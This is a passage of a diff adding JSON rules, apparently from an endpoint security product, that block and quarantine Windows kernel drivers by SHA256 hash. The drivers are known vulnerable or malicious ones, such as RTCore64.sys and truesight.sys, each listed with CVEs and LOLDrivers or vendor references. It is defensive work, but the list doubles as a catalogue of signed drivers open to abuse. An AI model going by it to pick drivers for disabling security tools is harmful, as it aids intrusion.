"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69640e9209f8e2ac25416bd3119b5308894b6ce22b5c80cb5d5f98f2f85d42ce", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af357cc6-1102-5859-ae0c-385eb26338b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + 
}, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617799Z", + "creation_date": "2026-03-23T11:45:29.617801Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617806Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da8945bd5c693c0593c9d0e3bda49bb1c6007cb25643c95708c6b10bef7c136a", + "comment": "Getac Technology vulnerable BIOS update tool (aka mtcBSv64.sys) [https://www.loldrivers.io/drivers/3bc629e8-7bf8-40c2-965b-87eb155e0065/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af3cbd70-77ed-5e3e-a934-e83c74938306", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824682Z", + "creation_date": "2026-03-23T11:45:31.824684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a84cd1c7cc9c0329e65fd5735586285239a010a5e83dd126c7504179a80918f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af3d05a9-3635-501f-b289-43481c1d36a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808783Z", + "creation_date": "2026-03-23T11:45:31.808787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808796Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fbe27ef8d48a5cf80ffd8e085cc4d40857fc946b0e3b99d4da0d1a765ee0639b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af488912-f1d2-5ca4-ba64-a2217e0d7f01", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607630Z", + "creation_date": 
"2026-03-23T11:45:29.607632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607637Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "696679114f6a106ec94c21e2a33fe17af86368bcf9a796aaea37ea6e8748ad6a", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af48e9c3-a04f-5b91-837c-2c2c2ab58bca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604573Z", + "creation_date": "2026-03-23T11:45:29.604575Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604580Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5db0fe4b16744f14b4ab1d255a4d3c63710d0073417bae9bb3bfeef4a09d38e0", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af58c950-3979-54af-b34b-46eec406dadb", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615697Z", + "creation_date": "2026-03-23T11:45:29.615699Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615704Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a502c904a7fe42183d3ea66f1e01fbd4321eb202280b054b9124dd333f093ba2", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af5ab8c8-e7eb-5beb-a908-cd7268cc62de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814147Z", + "creation_date": "2026-03-23T11:45:31.814150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814166Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8862e36702119584f443eb9a4bcb8df31cd6364ed2e545e6fd0d2bdcc3f453d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af60699a-fd52-5f26-933e-09bfa83ee05a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481186Z", + "creation_date": "2026-03-23T11:45:30.481188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481193Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d7d06d2f6af50ff5810c8d6a818cb59da635a56c0fdae5d0ed3d0aee4bedf3e", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af6bc271-2a53-5ea8-9be0-14998853cb62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980882Z", + "creation_date": "2026-03-23T11:45:29.980884Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980890Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ffd03584246730397e231eb8d16c1449aef2c3bc79bf9da3ebf8400a21b20ae7", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af81c2bd-ee89-567a-843f-3a116ea3e92f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818031Z", + "creation_date": "2026-03-23T11:45:30.818033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818038Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "442f12adebf7cb166b19e8aead2b0440450fd1f33f5db384a39776bb2656474a", + "comment": 
"Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af8c72ce-778f-5c29-bcc4-0a45ec488456", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813142Z", + "creation_date": "2026-03-23T11:45:31.813146Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813155Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94fb2c5a93881c8202ece91e31428061bfb595cb17126a64b4f595fa99798c2e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "af9c28c1-7faf-5062-b560-ddb9f86b4e7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.811729Z", + "creation_date": "2026-03-23T11:45:31.811731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811736Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7f31df69b8dc1460966ba3c1921cf051ae82b33524b7d1670108b87f727ad8b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "afad859b-ccaa-5da7-af56-cd0b67e64e0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477637Z", + "creation_date": "2026-03-23T11:45:30.477640Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477649Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07af8c5659ad293214364789df270c0e6d03d90f4f4495da76abc2d534c64d88", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"afb2121e-e12e-5702-ab1d-a9e9cfeba8c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481221Z", + "creation_date": "2026-03-23T11:45:30.481223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2decc56788d257ce7f6b1915c90ea5a54fb5232f2bf9f311958de495a4eb308", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "afbba428-730f-543a-99d9-6da7af2060ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983508Z", + "creation_date": "2026-03-23T11:45:29.983510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.983516Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b583414fcee280128788f7b39451c511376fe821f455d4f3702795e96d560704", + "comment": "Vulnerable Kernel Driver (aka KfeCo10X64.sys) [https://www.loldrivers.io/drivers/3e0bf6dc-791b-4170-8c40-427e7299d93d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "afbc4def-affe-5dce-a46f-c422ef56df2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979550Z", + "creation_date": "2026-03-23T11:45:29.979552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979557Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "06c5ebd0371342d18bc81a96f5e5ce28de64101e3c2fd0161d0b54d8368d2f1f", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "afbfb572-15f3-5e1b-a2a7-b52448414d5f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830464Z", + "creation_date": "2026-03-23T11:45:31.830466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830471Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bf3fa1666670063f79fff789c55dcff9c6038f642b92f9fbc7ba53ba7460e21", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "afd1dc69-25f3-53ee-8ea4-fb89a1f5d027", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972950Z", + "creation_date": "2026-03-23T11:45:29.972954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972960Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5cfad3d473961763306d72c12bd5ae14183a1a5778325c9acacca764b79ca185", + 
"comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "afe33387-da13-5e84-9138-ea7fe3012183", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619609Z", + "creation_date": "2026-03-23T11:45:29.619614Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619619Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e53b58415fa68552928622118d5b8a3a851b2fc512709a90b63ba46acda8b6b", + "comment": "Vulnerable Kernel Driver (aka SysDrv3S.sys) [https://www.loldrivers.io/drivers/cf49f43c-d7b4-4c1a-a40d-1be36ea64bff/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "affbc424-49e7-558f-a44d-4257dd516943", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825989Z", + 
"creation_date": "2026-03-23T11:45:31.825992Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825997Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6661ef3ce558cbdf27a01a4a4a6084fc2401cf4c13ba8615ec4690538b332f09", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b003ff71-c6fd-507d-a73f-5f206ad1ee3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156397Z", + "creation_date": "2026-03-23T11:45:31.156399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156404Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f8c7f9b8f55ac4236e25f9bdf962f507c3cf2e7f2d57782e9c9a0ac88a60da3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b004ef32-a9f2-59b6-a0c7-5e340b6a1588", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480192Z", + "creation_date": "2026-03-23T11:45:30.480194Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480199Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51145a3fa8258aac106f65f34159d23c54b48b6d54ec0421748b3939ab6778eb", + "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b005447e-f821-5d64-89ef-549eba2844f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981349Z", + "creation_date": "2026-03-23T11:45:29.981351Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", 
+ "hl_testing_start_time": "2026-03-23T11:45:29.981356Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eba14a2b4cefd74edaf38d963775352dc3618977e30261aab52be682a76b536f", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b0278ac7-09f4-5351-8bc0-d7477acca052", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836397Z", + "creation_date": "2026-03-23T11:45:30.836399Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836404Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6af8011def8267140004e3d2f779544862127d3840aaf570026ee5c5418e62d2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "b03e29a1-dcbb-51c2-a01f-057ae6db0957", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
